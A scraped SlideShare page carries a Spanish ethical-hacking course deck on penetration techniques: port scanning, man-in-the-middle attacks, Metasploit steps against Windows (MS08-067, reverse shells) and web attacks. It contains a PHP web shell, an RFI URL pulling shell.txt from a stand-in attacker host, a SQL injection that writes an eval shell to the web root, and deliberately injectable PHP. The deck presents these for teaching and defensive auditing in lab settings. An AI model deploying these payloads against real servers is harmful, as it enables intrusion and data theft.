SlideShare una empresa de Scribd logo
1 de 51
Técnicas avanzadas de
penetración a sistemas
HACKING ETICO
Los hackers éticos son profesionales de la seguridad que
aplican sus conocimientos de hacking con fines
defensivos (y legales). Diremos hacker siempre, pero hay
que fijarse en el contexto.
QUE ES UN HACKER

 Experto en algún campo de la informática
 Conocimientos profundos de diversas
  Plataformas (Windows, Unix, Linux, android).
 Conocimientos de redes
 Conocimientos de hardware y software.
Pasos previos al
                              ATAQUE
1. Reconocimiento
• Pasivo
• Activo
2. Rastreo (escaner)
3. Acceso
•   Niveles del Sistema
•   Redes
•   DOS
4. Mantener el
   acceso
5. Borrado de
   huellas
FOOTPRINTING


Obtención de los perfiles de seguridad de una organización
haciendo uso de una metodología (footprinting).

El resultado del footprinting es un perfil único de la
organización en cuanto a sus redes (Internet / Intranet /
Extranet /Wireless) y sistemas.
FOOTPRINTING

1.- Obtener información inicial
• whois
• nslookup
2.- Localizar el rango de red
• Traceroute
TIPOS DE ATAQUES
1.- Hacking WIFI         8.-Inyecciones SQL
2.-DOS                   9.-R.F.I
                         10.-XSS
3.-DDOS
                         11.-Inyeccion de
4.-M.I.T                 comandos arbitrarios
5.- Envenenamiento DNS   12.-Hijacking
6.-Reverse Shell         13.-Cookie poisoning
7.-Port scaning
Escaneo de Puertos



El escaneo de puertos es el ataque primario y mas común
utilizado en una auditoria ya sea legal o ilegal.
Nos permite :
Explorar
Identificar
Comprender
Técnicas
                               Tipo de
                               escaneo


                 Medio                                            Otros
 Abierto                          Silencioso         Barridos
                 abierto

TCP connect ()    TCP SYN                TCP FIN     TCP echo    UDP scan

Reverse Ident    Zombie scan         ACK Scan        UDP echo     FTP
                                                                 bounce
                                     Null Scan        TCP ACK     scan

                                    Xmas Scan         TCP SYN
                                                     ICMP echo
                                   SYN/ACK Scan
                                 Fragmentación TCP
TCP connect()
La mas común de cualquier software de escaneo de puertos
consiste en usar la llamada connect() de TCP

Intenta establecer conexión
Si conecta el puerto esta abierto
si no , el puerto esta cerrado
Si no contesta esta silencioso

Muy rápido e invasivo y llamativo en exceso.
* Miles de conexiones
*Logs
Comportamiento
                    TCP connect()
Hacker-------[SYN]------>[0] Puerto TCP Victima OPEN
Hacker<-------[SYN/ACK]-------[0] Puerto TCP Victima OPEN
Hacker-------[ACK]------->[0] Puerto TCP Victima OPEN

Hacker-------[SYN]------->[X] Puerto TCP Victima CLOSED
Hacker<-----[RST]-------[X] Puerto TCP Victima CLOSED

Hacker------[SYN]-------[*] Puerto TCP Victima SILENT
TCP SYN
Técnica conocida como Half-open scan, escaneo medio abierto por
excelencia
se envía un paquete SYN fingiendo establecer una conexion y se
espera la respuesta del Host, si llega un paquete SYN/ACK
significa que esta abierto y no devolvemos la contestación ACK,
devolvemos RST , esto para evitar que se complete el inicio
de conexión y así burlar el registro del sistema como intento de
conexión



                           *Discreto
                     *Excelentes resultados
Comportamiento
            TCP SYN
Hacker ---[SYN]---> [O] P. TCP abierto en la Victima
Hacker <---[SYN/ACK]--- [O] P. TCP abierto en la Victima
Hacker ---[RST]---> [O] P. TCP abierto en la Victima

Hacker ---[SYN]---> [X] Puerto TCP cerrado en la Victima
Hacker <---[RST]--- [X] Puerto TCP cerrado en la Victima

Hacker ---[SYN]---> [~] Puerto TCP silencioso en la Victima
ACK scan
Destinado a identificar aquellos puertos que están en estado
silencioso de forma precisa cuando un puerto esta en este estado o
no.
Envía paquetes ACK con números de secuencia y confirmación
aleatorios.
si el puerto esta abierto, responderá con un paquete RST, pues no
identificara la conexión como suya
si el puerto esta cerrado responderá RST pero si no responde es que
esta filtrado.
* Apoyo de un escaneo anterior
*Variable del ping si responde RST
 esta vivo si no es in alcanzable.
*Identificar firewall bloqueando SYN.
Comportamiento
             ACK scan
Hacker ---[ACK]---> [O] Puerto TCP abierto en la Victima
Hacker <---[RST]--- [O] Puerto TCP abierto en la Victima

Hacker ---[ACK]---> [X] Puerto TCP cerrado en la Victima
Hacker <---[RST]--- [X] Puerto TCP cerrado en la Victima

Hacker ---[ACK]---> [~] Puerto TCP silencioso en la Victima
Null scan
Similar al FIN, funciona del mismo modo, enviando
paquetes malformados, pero en este caso con
los flags desactivados, si el puerto esta cerrado nos
responderá con RST y En caso de no recibir nada el puerto
esta abierto o silencioso.

Ciertos firewalls vigilan los paquetes de finalización aquí
hace lo que FIN no.
Comportamiento
               Null scan

Hacker ---[ ]---> [O] Puerto TCP abierto en la Victima

local ---[ ]---> [X] Puerto TCP cerrado en la Victima
Hacker <---[RST]--- [X] Puerto TCP cerrado en la Victima

Hacker ---[ ]---> [~] Puerto TCP silencioso en la Victima
La razón
POC
Ataques MIT
  1.   DNS cache poisoning
  2.   ARP Poisoning
  3.   Phishing
  4.   Sslstrip
EXPLOTACION
Escáner de
vulnerabilidades
Escáner de
vulnerabilidades
EXPLOTACION
Metasploit
Windows Server 2003
Penetración
                           Windows Server 2003
                           prueba de concepto
      Puerto 445
1.    ms08067
2.    Crear usuario
3.    Habilitar Escritorio Remoto
4.    Cambiar la contraseña del Administrador


     OBJETIVO
     Mostrar el ataque de penetración a
     Windows server 2003 en un ambiente
     controlado.
Metasploit
Windows Server 2008 R2
Metasploit
                 Windows Server 2008 R2

 •Numero de vulnerabilidad : ms09050
 •Encontrar el servidor verificando versión de smb
 •Explotar la vulnerabilidad
 •Denegación de servicios.

OBJETIVO
Mostrar el ataque de Denegación de
servicios a Windows server 2008 en un
ambiente controlado.
Metasploit
Windows XP SP3
Metasploit
            Penetración a Windows XP SP3
                 Prueba de concepto
 1. Encontrar la victima verificando versión de SMB
 2. Lograr la obtención de una reverse shell
 3. Habilitar el uso de escritorio remoto
 4. Inyectar la conexión a escritorio remoto

OBJETIVO
Mostrar el ataque de penetración a
windows XP sp3 en un ambiente controlado.
Metasploit
Windows 7
Metasploit
                   Windows 7 Penetración
                    Prueba de concepto
 1. Usar INGENIERIA SOCIAL

 2. Copiar netcat a la victima y crear puerta trasera
    creando REVERSE SHELL
 3. Vulnerar navegador web.

 4. UPLOAD MI PATH C:DESTINODownloads

OBJETIVO
Mostrar el ataque de penetración a
windows 7 en un ambiente controlado.
Ataques WEB
Ataques XSS
Analicemos la vulnerabilidad de xss

Es una vulnerabilidad de grado medio alto ya que con estos
ataques será posible el re alizar el hijacking que es el robo de
identidad mediante las cookies del navegador
Ataques XSS
Ataques XSS
Ataques XSS
Ataques RFI
                 Remote file inclusion
vulnerabilidad que afecta únicamente a paginas dinámicas
programadas en PHP, consiste en enlazar archivos ubicados en un
servidor remoto.

RFI se aprovecha del uso irresponsable de las
funciones include y requiere, las cuales, debido al limitado
conocimiento del programador y
las pocas o nulas validaciones que realiza antes de incluir una variable
recibida por
parametro de URL, pueden ser aprovechadas por usuarios maliciosos
para incluir scripts
programados para explotar dicha vulnerabilidad.
Ataques RFI
                 Remote file inclusion
         http://www.victima.com/index.php?nav=pagina1php
         http://www.victimacom/index.php?nav=pagina2.php


        <?php
        print system($_GET['command']);
        ?>

http://www.victima.com/index.php?nav=http://atacante.com/shell
                      .txt&command=ls
Inyeccion SQL


union all select "<?php
eval($_GET['exec']); ?>",2,3,4into
outfile"/var/www/html/exec.php"
Analicemos este código
<?php
  $link = mysql_connect('127.0.0.1','root', 'pass');
  mysql_select_db('ejemplo', $link);
  $sql = mysql_query('select * from ejemplo where id='.$_GET['id'], $link);
  if(mysql_errno($link))
  { echo mysql_error($link);
  exit;
  }
  while($row = mysql_fetch_assoc($sql))
  { echo $
  row['id']."
  ".$row['titulo']."
  ".$row['contenido']."
  ".$row['parent'];
  }?
  >
Busqueda de tablas.
Evacion de IDS
El atacante sabe que existen filtros que evitara la
llegada de la inyección al servidor, el usara una
combinación de caracteres y encriptaciones para
saltarse los filtros y el IDS lo reconozca como
validos.
Char double encode

  El atacante sabe que existen filtros que evitara la
  llegada de la inyección al servidor, el usara una
  combinación de caracteres y encriptaciones para
  saltarse los filtros y el IDS lo reconozca como
  validos.
Space 2 mssql blank
 El atacante sabe que existen filtros que evitara la
 llegada de la inyección al servidor, el usara una
 combinación de caracteres y encriptaciones para
 saltarse los filtros y el IDS lo reconozca como
 validos.
Prueba de concepto

OBJETIVO
Mostrar el ataque de inyección SQL y el
dumpeo de la BD. en un ambiente
controlado.
GRACIAS

Más contenido relacionado

La actualidad más candente

Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]RootedCON
 
Lw2010 - Uso De La Programacion En Linux Para La Seguridad En Redes
Lw2010 - Uso De La Programacion En Linux Para La Seguridad En RedesLw2010 - Uso De La Programacion En Linux Para La Seguridad En Redes
Lw2010 - Uso De La Programacion En Linux Para La Seguridad En Redesguest5d7f33c
 
Port Knocking Securización De Servidores
Port Knocking   Securización De ServidoresPort Knocking   Securización De Servidores
Port Knocking Securización De ServidoresRo Arq
 
Javier Saez - Una panorámica sobre la seguridad en entornos web [rootedvlc2]
Javier Saez - Una panorámica sobre la seguridad en entornos web [rootedvlc2]Javier Saez - Una panorámica sobre la seguridad en entornos web [rootedvlc2]
Javier Saez - Una panorámica sobre la seguridad en entornos web [rootedvlc2]RootedCON
 
CPMX5 - Hacking like a boss por Roberto Salgado
CPMX5 - Hacking like a boss por Roberto SalgadoCPMX5 - Hacking like a boss por Roberto Salgado
CPMX5 - Hacking like a boss por Roberto SalgadoWebsec México, S.C.
 
Exploracion de puertos de redes
Exploracion de puertos de redesExploracion de puertos de redes
Exploracion de puertos de redesgiulianaCh
 
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...RootedCON
 
Técnicas de escaneo masivo - 11/2013
Técnicas de escaneo masivo - 11/2013Técnicas de escaneo masivo - 11/2013
Técnicas de escaneo masivo - 11/2013Websec México, S.C.
 
Taller: Exploración de redes con Nmap
Taller: Exploración de redes con NmapTaller: Exploración de redes con Nmap
Taller: Exploración de redes con NmapWebsec México, S.C.
 
Jose M Mejia - Usando computación paralela GPU en malware y herramientas de h...
Jose M Mejia - Usando computación paralela GPU en malware y herramientas de h...Jose M Mejia - Usando computación paralela GPU en malware y herramientas de h...
Jose M Mejia - Usando computación paralela GPU en malware y herramientas de h...RootedCON
 
Protegiendo SIP y SSH con Fail2ban en Elastix
Protegiendo SIP y SSH con Fail2ban en ElastixProtegiendo SIP y SSH con Fail2ban en Elastix
Protegiendo SIP y SSH con Fail2ban en ElastixPaloSanto Solutions
 
Mariano Palomo - Taller de reversing en sistemas Windows aplicado a CTFs [ro...
Mariano Palomo  - Taller de reversing en sistemas Windows aplicado a CTFs [ro...Mariano Palomo  - Taller de reversing en sistemas Windows aplicado a CTFs [ro...
Mariano Palomo - Taller de reversing en sistemas Windows aplicado a CTFs [ro...RootedCON
 
Abraham Pasamar & Carlos Fernández - Purple brain, purple brain ... [rooted2019]
Abraham Pasamar & Carlos Fernández - Purple brain, purple brain ... [rooted2019]Abraham Pasamar & Carlos Fernández - Purple brain, purple brain ... [rooted2019]
Abraham Pasamar & Carlos Fernández - Purple brain, purple brain ... [rooted2019]RootedCON
 
Presentacion Intermedia - Seguridad SIP
Presentacion Intermedia - Seguridad SIPPresentacion Intermedia - Seguridad SIP
Presentacion Intermedia - Seguridad SIPclaudio.navarro
 
MAITAINING ACCESS
MAITAINING ACCESSMAITAINING ACCESS
MAITAINING ACCESSTensor
 

La actualidad más candente (19)

Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
 
Lw2010 - Uso De La Programacion En Linux Para La Seguridad En Redes
Lw2010 - Uso De La Programacion En Linux Para La Seguridad En RedesLw2010 - Uso De La Programacion En Linux Para La Seguridad En Redes
Lw2010 - Uso De La Programacion En Linux Para La Seguridad En Redes
 
Titulacion 2 1 Nmap
Titulacion 2 1   NmapTitulacion 2 1   Nmap
Titulacion 2 1 Nmap
 
Presentacion Hacking Asterisk
Presentacion Hacking AsteriskPresentacion Hacking Asterisk
Presentacion Hacking Asterisk
 
Port Knocking Securización De Servidores
Port Knocking   Securización De ServidoresPort Knocking   Securización De Servidores
Port Knocking Securización De Servidores
 
Javier Saez - Una panorámica sobre la seguridad en entornos web [rootedvlc2]
Javier Saez - Una panorámica sobre la seguridad en entornos web [rootedvlc2]Javier Saez - Una panorámica sobre la seguridad en entornos web [rootedvlc2]
Javier Saez - Una panorámica sobre la seguridad en entornos web [rootedvlc2]
 
CPMX5 - Hacking like a boss por Roberto Salgado
CPMX5 - Hacking like a boss por Roberto SalgadoCPMX5 - Hacking like a boss por Roberto Salgado
CPMX5 - Hacking like a boss por Roberto Salgado
 
Exploracion de puertos de redes
Exploracion de puertos de redesExploracion de puertos de redes
Exploracion de puertos de redes
 
Pablo sanemeteriovalencia
Pablo sanemeteriovalenciaPablo sanemeteriovalencia
Pablo sanemeteriovalencia
 
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
 
Técnicas de escaneo masivo - 11/2013
Técnicas de escaneo masivo - 11/2013Técnicas de escaneo masivo - 11/2013
Técnicas de escaneo masivo - 11/2013
 
Taller: Exploración de redes con Nmap
Taller: Exploración de redes con NmapTaller: Exploración de redes con Nmap
Taller: Exploración de redes con Nmap
 
Jose M Mejia - Usando computación paralela GPU en malware y herramientas de h...
Jose M Mejia - Usando computación paralela GPU en malware y herramientas de h...Jose M Mejia - Usando computación paralela GPU en malware y herramientas de h...
Jose M Mejia - Usando computación paralela GPU en malware y herramientas de h...
 
Protegiendo SIP y SSH con Fail2ban en Elastix
Protegiendo SIP y SSH con Fail2ban en ElastixProtegiendo SIP y SSH con Fail2ban en Elastix
Protegiendo SIP y SSH con Fail2ban en Elastix
 
Mariano Palomo - Taller de reversing en sistemas Windows aplicado a CTFs [ro...
Mariano Palomo  - Taller de reversing en sistemas Windows aplicado a CTFs [ro...Mariano Palomo  - Taller de reversing en sistemas Windows aplicado a CTFs [ro...
Mariano Palomo - Taller de reversing en sistemas Windows aplicado a CTFs [ro...
 
Nikto
Nikto Nikto
Nikto
 
Abraham Pasamar & Carlos Fernández - Purple brain, purple brain ... [rooted2019]
Abraham Pasamar & Carlos Fernández - Purple brain, purple brain ... [rooted2019]Abraham Pasamar & Carlos Fernández - Purple brain, purple brain ... [rooted2019]
Abraham Pasamar & Carlos Fernández - Purple brain, purple brain ... [rooted2019]
 
Presentacion Intermedia - Seguridad SIP
Presentacion Intermedia - Seguridad SIPPresentacion Intermedia - Seguridad SIP
Presentacion Intermedia - Seguridad SIP
 
MAITAINING ACCESS
MAITAINING ACCESSMAITAINING ACCESS
MAITAINING ACCESS
 

Similar a Tecnicas avanzadas de penetracion a sistemas con ids

Escaneo de puertos clase 2 complemento b 28 02-13
Escaneo de puertos clase 2 complemento b 28 02-13Escaneo de puertos clase 2 complemento b 28 02-13
Escaneo de puertos clase 2 complemento b 28 02-13Tensor
 
Webinar Gratuito: "Técnicas para Escaneo de Puertos con Nmap"
Webinar Gratuito: "Técnicas para Escaneo de Puertos con Nmap"Webinar Gratuito: "Técnicas para Escaneo de Puertos con Nmap"
Webinar Gratuito: "Técnicas para Escaneo de Puertos con Nmap"Alonso Caballero
 
Scripting para Pentesters v1.0
Scripting para Pentesters v1.0Scripting para Pentesters v1.0
Scripting para Pentesters v1.0wcuestas
 
Introduccion a la Seguridad informatica
Introduccion a la Seguridad informaticaIntroduccion a la Seguridad informatica
Introduccion a la Seguridad informaticaCarlos Miranda
 
Escaneo, enumeración de puertos en la red. OMHE
Escaneo, enumeración de puertos en la red. OMHEEscaneo, enumeración de puertos en la red. OMHE
Escaneo, enumeración de puertos en la red. OMHEHéctor López
 
Extendiendo la Seguridad de Elastix con Snort
Extendiendo la Seguridad de Elastix con SnortExtendiendo la Seguridad de Elastix con Snort
Extendiendo la Seguridad de Elastix con SnortJuan Oliva
 
Extendiendo la seguridad en Elastix con Snort IDS/IPS
Extendiendo la seguridad en Elastix con Snort IDS/IPSExtendiendo la seguridad en Elastix con Snort IDS/IPS
Extendiendo la seguridad en Elastix con Snort IDS/IPSPaloSanto Solutions
 
Infor nmap6 listado_de_comandos by pseudor00t
Infor nmap6 listado_de_comandos by pseudor00t Infor nmap6 listado_de_comandos by pseudor00t
Infor nmap6 listado_de_comandos by pseudor00t pseudor00t overflow
 
Multi relay
Multi relayMulti relay
Multi relayjselvi
 
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]RootedCON
 
Lw2010 Pedro Valera
Lw2010 Pedro ValeraLw2010 Pedro Valera
Lw2010 Pedro Valeraguestf280e2
 
Testing Redes Inalambricas wifiway (Definiciones))
Testing Redes Inalambricas wifiway (Definiciones))Testing Redes Inalambricas wifiway (Definiciones))
Testing Redes Inalambricas wifiway (Definiciones))begolnx
 
Clase practica seguridad escaneo con nma pf
Clase practica seguridad   escaneo con nma pfClase practica seguridad   escaneo con nma pf
Clase practica seguridad escaneo con nma pfRobert Puican Gutierrez
 
Airbase y KARMetasploit
Airbase y KARMetasploitAirbase y KARMetasploit
Airbase y KARMetasploitDaniel
 

Similar a Tecnicas avanzadas de penetracion a sistemas con ids (20)

escaneo de puertos.pptx
escaneo de puertos.pptxescaneo de puertos.pptx
escaneo de puertos.pptx
 
Escaneo de puertos clase 2 complemento b 28 02-13
Escaneo de puertos clase 2 complemento b 28 02-13Escaneo de puertos clase 2 complemento b 28 02-13
Escaneo de puertos clase 2 complemento b 28 02-13
 
Webinar Gratuito: "Técnicas para Escaneo de Puertos con Nmap"
Webinar Gratuito: "Técnicas para Escaneo de Puertos con Nmap"Webinar Gratuito: "Técnicas para Escaneo de Puertos con Nmap"
Webinar Gratuito: "Técnicas para Escaneo de Puertos con Nmap"
 
Main in the middle
Main in the middleMain in the middle
Main in the middle
 
Main in the middle
Main in the middleMain in the middle
Main in the middle
 
Scripting para Pentesters v1.0
Scripting para Pentesters v1.0Scripting para Pentesters v1.0
Scripting para Pentesters v1.0
 
Introduccion a la Seguridad informatica
Introduccion a la Seguridad informaticaIntroduccion a la Seguridad informatica
Introduccion a la Seguridad informatica
 
Nmap
NmapNmap
Nmap
 
Escaneo, enumeración de puertos en la red. OMHE
Escaneo, enumeración de puertos en la red. OMHEEscaneo, enumeración de puertos en la red. OMHE
Escaneo, enumeración de puertos en la red. OMHE
 
Dns spoofing kali linux
Dns spoofing kali linuxDns spoofing kali linux
Dns spoofing kali linux
 
Extendiendo la Seguridad de Elastix con Snort
Extendiendo la Seguridad de Elastix con SnortExtendiendo la Seguridad de Elastix con Snort
Extendiendo la Seguridad de Elastix con Snort
 
Extendiendo la seguridad en Elastix con Snort IDS/IPS
Extendiendo la seguridad en Elastix con Snort IDS/IPSExtendiendo la seguridad en Elastix con Snort IDS/IPS
Extendiendo la seguridad en Elastix con Snort IDS/IPS
 
Infor nmap6 listado_de_comandos by pseudor00t
Infor nmap6 listado_de_comandos by pseudor00t Infor nmap6 listado_de_comandos by pseudor00t
Infor nmap6 listado_de_comandos by pseudor00t
 
Multi relay
Multi relayMulti relay
Multi relay
 
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
 
Lw2010 Pedro Valera
Lw2010 Pedro ValeraLw2010 Pedro Valera
Lw2010 Pedro Valera
 
Testing Redes Inalambricas wifiway (Definiciones))
Testing Redes Inalambricas wifiway (Definiciones))Testing Redes Inalambricas wifiway (Definiciones))
Testing Redes Inalambricas wifiway (Definiciones))
 
Clase practica seguridad escaneo con nma pf
Clase practica seguridad   escaneo con nma pfClase practica seguridad   escaneo con nma pf
Clase practica seguridad escaneo con nma pf
 
Airbase y KARMetasploit
Airbase y KARMetasploitAirbase y KARMetasploit
Airbase y KARMetasploit
 
Ataques Informáticos
Ataques InformáticosAtaques Informáticos
Ataques Informáticos
 

Tecnicas avanzadas de penetracion a sistemas con ids

  • 2. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking con fines defensivos (y legales). Diremos hacker siempre, pero hay que fijarse en el contexto.
  • 3. QUE ES UN HACKER  Experto en algún campo de la informática  Conocimientos profundos de diversas Plataformas (Windows, Unix, Linux, android).  Conocimientos de redes  Conocimientos de hardware y software.
  • 4. Pasos previos al ATAQUE 1. Reconocimiento • Pasivo • Activo 2. Rastreo (escaner) 3. Acceso • Niveles del Sistema • Redes • DOS 4. Mantener el acceso 5. Borrado de huellas
  • 5. FOOTPRINTING Obtención de los perfiles de seguridad de una organización haciendo uso de una metodología (footprinting). El resultado del footprinting es un perfil único de la organización en cuanto a sus redes (Internet / Intranet / Extranet /Wireless) y sistemas.
  • 6. FOOTPRINTING 1.- Obtener información inicial • whois • nslookup 2.- Localizar el rango de red • Traceroute
  • 7. TIPOS DE ATAQUES 1.- Hacking WIFI 8.-Inyecciones SQL 2.-DOS 9.-R.F.I 10.-XSS 3.-DDOS 11.-Inyeccion de 4.-M.I.T comandos arbitrarios 5.- Envenenamiento DNS 12.-Hijacking 6.-Reverse Shell 13.-Cookie poisoning 7.-Port scaning
  • 8.
  • 9. Escaneo de Puertos El escaneo de puertos es el ataque primario y mas común utilizado en una auditoria ya sea legal o ilegal. Nos permite : Explorar Identificar Comprender
  • 10. Técnicas Tipo de escaneo Medio Otros Abierto Silencioso Barridos abierto TCP connect () TCP SYN TCP FIN TCP echo UDP scan Reverse Ident Zombie scan ACK Scan UDP echo FTP bounce Null Scan TCP ACK scan Xmas Scan TCP SYN ICMP echo SYN/ACK Scan Fragmentación TCP
  • 11. TCP connect() La mas común de cualquier software de escaneo de puertos consiste en usar la llamada connect() de TCP Intenta establecer conexión Si conecta el puerto esta abierto si no , el puerto esta cerrado Si no contesta esta silencioso Muy rápido e invasivo y llamativo en exceso. * Miles de conexiones *Logs
  • 12. Comportamiento TCP connect() Hacker-------[SYN]------>[0] Puerto TCP Victima OPEN Hacker<-------[SYN/ACK]-------[0] Puerto TCP Victima OPEN Hacker-------[ACK]------->[0] Puerto TCP Victima OPEN Hacker-------[SYN]------->[X] Puerto TCP Victima CLOSED Hacker<-----[RST]-------[X] Puerto TCP Victima CLOSED Hacker------[SYN]-------[*] Puerto TCP Victima SILENT
  • 13. TCP SYN Técnica conocida como Half-open scan, escaneo medio abierto por excelencia se envía un paquete SYN fingiendo establecer una conexion y se espera la respuesta del Host, si llega un paquete SYN/ACK significa que esta abierto y no devolvemos la contestación ACK, devolvemos RST , esto para evitar que se complete el inicio de conexión y así burlar el registro del sistema como intento de conexión *Discreto *Excelentes resultados
  • 14. Comportamiento TCP SYN Hacker ---[SYN]---> [O] P. TCP abierto en la Victima Hacker <---[SYN/ACK]--- [O] P. TCP abierto en la Victima Hacker ---[RST]---> [O] P. TCP abierto en la Victima Hacker ---[SYN]---> [X] Puerto TCP cerrado en la Victima Hacker <---[RST]--- [X] Puerto TCP cerrado en la Victima Hacker ---[SYN]---> [~] Puerto TCP silencioso en la Victima
  • 15. ACK scan Destinado a identificar aquellos puertos que están en estado silencioso de forma precisa cuando un puerto esta en este estado o no. Envía paquetes ACK con números de secuencia y confirmación aleatorios. si el puerto esta abierto, responderá con un paquete RST, pues no identificara la conexión como suya si el puerto esta cerrado responderá RST pero si no responde es que esta filtrado. * Apoyo de un escaneo anterior *Variable del ping si responde RST esta vivo si no es in alcanzable. *Identificar firewall bloqueando SYN.
  • 16. Comportamiento ACK scan Hacker ---[ACK]---> [O] Puerto TCP abierto en la Victima Hacker <---[RST]--- [O] Puerto TCP abierto en la Victima Hacker ---[ACK]---> [X] Puerto TCP cerrado en la Victima Hacker <---[RST]--- [X] Puerto TCP cerrado en la Victima Hacker ---[ACK]---> [~] Puerto TCP silencioso en la Victima
  • 17. Null scan Similar al FIN, funciona del mismo modo, enviando paquetes malformados, pero en este caso con los flags desactivados, si el puerto esta cerrado nos responderá con RST y En caso de no recibir nada el puerto esta abierto o silencioso. Ciertos firewalls vigilan los paquetes de finalización aquí hace lo que FIN no.
  • 18. Comportamiento Null scan Hacker ---[ ]---> [O] Puerto TCP abierto en la Victima local ---[ ]---> [X] Puerto TCP cerrado en la Victima Hacker <---[RST]--- [X] Puerto TCP cerrado en la Victima Hacker ---[ ]---> [~] Puerto TCP silencioso en la Victima
  • 20. POC
  • 21. Ataques MIT 1. DNS cache poisoning 2. ARP Poisoning 3. Phishing 4. Sslstrip
  • 25.
  • 28. Penetración Windows Server 2003 prueba de concepto Puerto 445 1. ms08067 2. Crear usuario 3. Habilitar Escritorio Remoto 4. Cambiar la contraseña del Administrador OBJETIVO Mostrar el ataque de penetración a Windows server 2003 en un ambiente controlado.
  • 30. Metasploit Windows Server 2008 R2 •Numero de vulnerabilidad : ms09050 •Encontrar el servidor verificando versión de smb •Explotar la vulnerabilidad •Denegación de servicios. OBJETIVO Mostrar el ataque de Denegación de servicios a Windows server 2008 en un ambiente controlado.
  • 32. Metasploit Penetración a Windows XP SP3 Prueba de concepto 1. Encontrar la victima verificando versión de SMB 2. Lograr la obtención de una reverse shell 3. Habilitar el uso de escritorio remoto 4. Inyectar la conexión a escritorio remoto OBJETIVO Mostrar el ataque de penetración a windows XP sp3 en un ambiente controlado.
  • 34. Metasploit Windows 7 Penetración Prueba de concepto 1. Usar INGENIERIA SOCIAL 2. Copiar netcat a la victima y crear puerta trasera creando REVERSE SHELL 3. Vulnerar navegador web. 4. UPLOAD MI PATH C:DESTINODownloads OBJETIVO Mostrar el ataque de penetración a windows 7 en un ambiente controlado.
  • 36. Ataques XSS Analicemos la vulnerabilidad de xss Es una vulnerabilidad de grado medio alto ya que con estos ataques será posible el re alizar el hijacking que es el robo de identidad mediante las cookies del navegador
  • 40. Ataques RFI Remote file inclusion vulnerabilidad que afecta únicamente a paginas dinámicas programadas en PHP, consiste en enlazar archivos ubicados en un servidor remoto. RFI se aprovecha del uso irresponsable de las funciones include y requiere, las cuales, debido al limitado conocimiento del programador y las pocas o nulas validaciones que realiza antes de incluir una variable recibida por parametro de URL, pueden ser aprovechadas por usuarios maliciosos para incluir scripts programados para explotar dicha vulnerabilidad.
  • 41. Ataques RFI Remote file inclusion http://www.victima.com/index.php?nav=pagina1php http://www.victimacom/index.php?nav=pagina2.php <?php print system($_GET['command']); ?> http://www.victima.com/index.php?nav=http://atacante.com/shell .txt&command=ls
  • 42.
  • 43. Inyeccion SQL union all select "<?php eval($_GET['exec']); ?>",2,3,4into outfile"/var/www/html/exec.php"
  • 44. Analicemos este código <?php $link = mysql_connect('127.0.0.1','root', 'pass'); mysql_select_db('ejemplo', $link); $sql = mysql_query('select * from ejemplo where id='.$_GET['id'], $link); if(mysql_errno($link)) { echo mysql_error($link); exit; } while($row = mysql_fetch_assoc($sql)) { echo $ row['id']." ".$row['titulo']." ".$row['contenido']." ".$row['parent']; }? >
  • 47. El atacante sabe que existen filtros que evitara la llegada de la inyección al servidor, el usara una combinación de caracteres y encriptaciones para saltarse los filtros y el IDS lo reconozca como validos.
  • 48. Char double encode El atacante sabe que existen filtros que evitara la llegada de la inyección al servidor, el usara una combinación de caracteres y encriptaciones para saltarse los filtros y el IDS lo reconozca como validos.
  • 49. Space 2 mssql blank El atacante sabe que existen filtros que evitara la llegada de la inyección al servidor, el usara una combinación de caracteres y encriptaciones para saltarse los filtros y el IDS lo reconozca como validos.
  • 50. Prueba de concepto OBJETIVO Mostrar el ataque de inyección SQL y el dumpeo de la BD. en un ambiente controlado.